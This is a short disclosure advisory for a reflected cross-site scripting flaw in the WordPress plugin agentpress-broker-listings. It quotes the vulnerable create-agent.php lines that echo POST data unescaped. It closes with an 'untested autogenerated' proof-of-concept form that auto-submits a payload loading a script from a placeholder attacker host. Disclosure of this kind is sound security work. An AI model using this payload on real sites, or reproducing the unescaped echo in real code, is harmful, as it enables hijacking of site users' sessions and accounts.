Larry Cashdollar Vulnerability

There is a reflected XSS vulnerability in the following php code ./agentpress-broker-listings/create-agent.php: 67: <input type='text' name='agent[agent_name]' class='name' id='agent[agent_name]' value="<?php echo $_POST["agent"]['name'];?>" /> 72: <input type='text' name='agent[agent_contact]' class='name' id='agent[agent_contact]' value="<?php echo $_POST["agent"]['contact'];?>" /> 77: <input type='text' name='agent[agent_email]' class='name' id='agent[agent_email]' value="<?php echo $_POST["agent"]['email'];?>" /> 81: <textarea class="name" id="agent[description]" name="agent[agent_description]"><?php echo $_POST["agent"]['description'];?></textarea> The variable agent appears to send unsanitized data back to the users browser via POST request.

This is an untested autogenerated exploit:
XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html
<form name=TheForm action=http://[target]/wp-content/plugins/agentpress-broker-listings/create-agent.php method=post> <input type=hidden name=agent value="><script src=http://attacker/bad.js></script>> </form> <script> document.TheForm.submit(); </script>